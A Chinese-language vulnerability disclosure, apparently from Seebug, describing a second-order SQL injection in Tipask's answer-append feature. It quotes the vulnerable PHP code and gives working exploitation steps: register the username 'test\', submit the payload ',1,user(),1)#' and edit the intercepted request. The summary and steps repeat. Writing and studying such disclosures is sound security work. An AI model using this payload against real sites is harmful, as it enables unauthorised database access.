### 简要描述: sql注入漏洞(2次注入) ### 详细说明: 官方最新源码测试 在control中answer.php中 ``` * 追问模块---追问 */ function onappend() { $this->load("message"); $qid = intval($this->get[2]) ? $this->get[2] : intval($this->post['qid']); $aid = intval($this->get[3]) ? $this->get[3] : intval($this->post['aid']); $question = $_ENV['question']->get($qid); $answer = $_ENV['answer']->get($aid); if (!$question || !$answer) { $this->message("回答内容不存在!"); exit; } $viewurl = urlmap('question/view/' . $qid, 2); if (isset($this->post['submit'])) { //echo $this->user['username'];exit(); $_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']); if ($answer['authorid'] == $this->user['uid']) {//继续回答 $_ENV['message']->add($this->user['username'], $this->user['uid'], $question['authorid'], $this->user['username'] . '继续回答了您的问题:' . $question['title'], $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看</a>'); $_ENV['doing']->add($this->user['uid'],...
### 简要描述: sql注入漏洞(2次注入) ### 详细说明: 官方最新源码测试 在control中answer.php中 ``` * 追问模块---追问 */ function onappend() { $this->load("message"); $qid = intval($this->get[2]) ? $this->get[2] : intval($this->post['qid']); $aid = intval($this->get[3]) ? $this->get[3] : intval($this->post['aid']); $question = $_ENV['question']->get($qid); $answer = $_ENV['answer']->get($aid); if (!$question || !$answer) { $this->message("回答内容不存在!"); exit; } $viewurl = urlmap('question/view/' . $qid, 2); if (isset($this->post['submit'])) { //echo $this->user['username'];exit(); $_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']); if ($answer['authorid'] == $this->user['uid']) {//继续回答 $_ENV['message']->add($this->user['username'], $this->user['uid'], $question['authorid'], $this->user['username'] . '继续回答了您的问题:' . $question['title'], $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看</a>'); $_ENV['doing']->add($this->user['uid'], $this->user['username'], 7, $qid, $this->post['content']); $this->message('继续回答成功!', $viewurl); } else {//继续追问 $_ENV['message']->add($this->user['username'], $this->user['uid'], $answer['authorid'], $this->user['username'] . '对您的回答进行了追问', $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看问题</a>'); $_ENV['doing']->add($this->user['uid'], $this->user['username'], 6, $qid, $this->post['content'], $answer['id'], $answer['authorid'], $answer['content']); $this->message('继续提问成功!', $viewurl); } } include template("appendanswer"); } ``` 追加问题模块, 追问模块当中 $_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']); 其中$this->user['username'] 为从数据库当中取出来的值,未涉及过滤。 后面中$this->post['content']为可控的变量,即为评论内容。 跟踪该执行函数append,在model当中answer.class.php ``` /* 添加追问--追问--回答 */ function append($answerid, $author, $authorid, $content) { //echo "INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})";exit(); $this->db->query("INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})"); return $this->db->insert_id(); } ``` 可看到执行了一个insert sql语句 当其中我们控制$author即可,例如注册畸形用户名 test\ 或者 test'即可 当我们注册test\用户,content我们设置为 ,1,user(),1)# 最终执行语句如下: INSERT INTO ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\’,4,’,1,user(),1)#aaaa’,1423503510) 执行如下 ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\’,4,’,1,user(),1) 即会再我们的追加问题当中直接回显root@localhost 利用步骤: 1、注册用户名为test\ 2、编辑 http://localhost/tipask/?answer/append/1/1.html(需先提问,有人回答,才能追问) [<img src="https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png" alt="22222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png) 截取该包,他会自动加上<p>标签,所以得去掉该<p>标签,然后发送即可 如上图。 3、直接回显内容 [<img src="https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png" alt="88888889999999.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png) ### 漏洞证明: 1、注册用户名为test\ 2、编辑 http://localhost/tipask/?answer/append/1/1.html(需先提问,有人回答,才能追问) [<img src="https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png" alt="22222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png) 截取该包,他会自动加上<p>标签,所以得去掉该<p>标签,然后发送即可 如上图。 3、直接回显内容 [<img src="https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png" alt="88888889999999.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)
